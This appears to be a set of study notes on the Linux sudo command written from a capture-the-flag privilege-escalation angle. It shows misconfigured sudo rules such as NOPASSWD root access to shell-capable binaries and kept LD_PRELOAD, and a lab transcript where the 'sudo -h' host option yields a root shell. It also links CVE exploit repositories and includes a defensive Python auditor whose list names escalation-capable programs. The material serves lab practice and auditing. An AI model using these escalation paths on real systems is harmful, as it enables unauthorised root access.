
Linux command: sudo

sudo, sudoedit — execute a command as another user

sudo -l
sudo -ll
sudo -V
sudo -u user command

# which sudo
/usr/bin/sudo
# ls -la /usr/bin/sudo
-rwsr-xr-x 1 root root 182600 Jan 30 08:12 /usr/bin/sudo
#

Example

user@debian:~$ sudo -l
Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH

User user may run the following commands on this host:
    (root) NOPASSWD: /usr/sbin/iftop
    (root) NOPASSWD: /usr/bin/find
    (root) NOPASSWD: /usr/bin/nano
    (root) NOPASSWD: /usr/bin/vim
    (root) NOPASSWD: /usr/bin/man
    (root) NOPASSWD: /usr/bin/awk
    (root) NOPASSWD: /usr/bin/less
    (root) NOPASSWD: /usr/bin/ftp
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/sbin/apache2
    (root) NOPASSWD: /bin/more
user@debian:~$
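
A defender-side check for a listing like the one above, added here as an example and not part of the original notes: it parses the short `sudo -l` output and reports kept loader variables, passwordless rules and blanket ALL grants. The SPAWNERS set and the severity labels are assumptions of this example, and the sample text is constructed.

```python
import re

# Constructed sample in the format of the `sudo -l` listing shown above.
SAMPLE = """\
Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH

User user may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/find
    (root) NOPASSWD: /usr/sbin/apache2
    (ALL : ALL) ALL
"""

# Assumption: a reviewer-maintained set of programs that can start other
# programs, so a root rule for one of them is broader than its path suggests.
SPAWNERS = {"find", "nano", "vim", "man", "awk", "less", "more", "ftp", "nmap"}
# Dynamic-loader variables; env_keep carries them into the root process.
LOADER_VARS = {"LD_PRELOAD", "LD_LIBRARY_PATH"}
# "(runas) [TAG: ...] command[, command]" as printed by the short listing.
RULE = re.compile(r"^\s+\((?P<runas>[^)]*)\)\s+(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>.+)$")

def audit(listing):
    """Return (severity, message) findings for one `sudo -l` listing."""
    findings = []
    in_defaults = False
    for line in listing.splitlines():
        if line.startswith("Matching Defaults"):
            in_defaults = True
        elif line.startswith("User "):
            in_defaults = False
        elif in_defaults:
            for value in re.findall(r"env_keep\+?=([^,]+)", line):
                for var in value.strip('" ').split():
                    if var in LOADER_VARS:
                        findings.append(("HIGH", f"env_keep preserves {var}"))
        elif (m := RULE.match(line)):
            nopass = "NOPASSWD:" in m["tags"]
            for cmd in re.split(r"(?<!\\),\s*", m["cmd"].strip()):
                prog = cmd.split()[0].rsplit("/", 1)[-1]
                if cmd == "ALL":
                    findings.append(("HIGH", f"({m['runas']}) may run ALL commands"))
                elif prog in SPAWNERS:
                    sev = "HIGH" if nopass else "MEDIUM"
                    findings.append((sev, f"{cmd} can start other programs as {m['runas']}"))
                elif nopass:
                    findings.append(("LOW", f"{cmd} runs without a password"))
    return findings

if __name__ == "__main__":
    for severity, message in audit(SAMPLE):
        print(f"{severity:6} {message}")
```

Findings of this kind are usually closed by removing the env_keep entries from sudoers and granting file edits through sudoedit instead of an editor rule.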

Example: sudo with -h option (run command on host)

alice@looking-glass:/tmp$ id
uid=1005(alice) gid=1005(alice) groups=1005(alice)
alice@looking-glass:/tmp$ cat /etc/sudoers.d/alice
alice ssalg-gnikool = (root) NOPASSWD: /bin/bash
alice@looking-glass:/tmp$ sudo -h ssalg-gnikool /bin/bash
sudo: unable to resolve host ssalg-gnikool
root@looking-glass:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@looking-glass:/tmp#

Example: jenny can Run ALL Commands As ALL Users, As ALL Groups

jenny@wir3:/$ sudo -l
sudo -l
[sudo] password for jenny: 987654321

Matching Defaults entries for jenny on wir3:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jenny may run the following commands on wir3:
    (ALL : ALL) ALL

jenny@wir3:/$ sudo -ll
sudo -ll
Matching Defaults entries for jenny on wir3:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jenny may run the following commands on wir3:

Sudoers entry:
    RunAsUsers: ALL
    RunAsGroups: ALL
    Commands:
        ALL
jenny@wir3:/$

Practice

>>> CVE-2019-18634: pwfeedback - https://github.com/saleemrashid/sudo-cve-2019-18634

>>> CVE-2019-18634: THM | hackerNote

>>> CVE-2021-3156: THM | Baron Samedit

>>> THM | Linux PrivEsc Arena

>>> THM | Linux PrivEsc

>>> THM | Looking Glass

>>> THM | h4cked
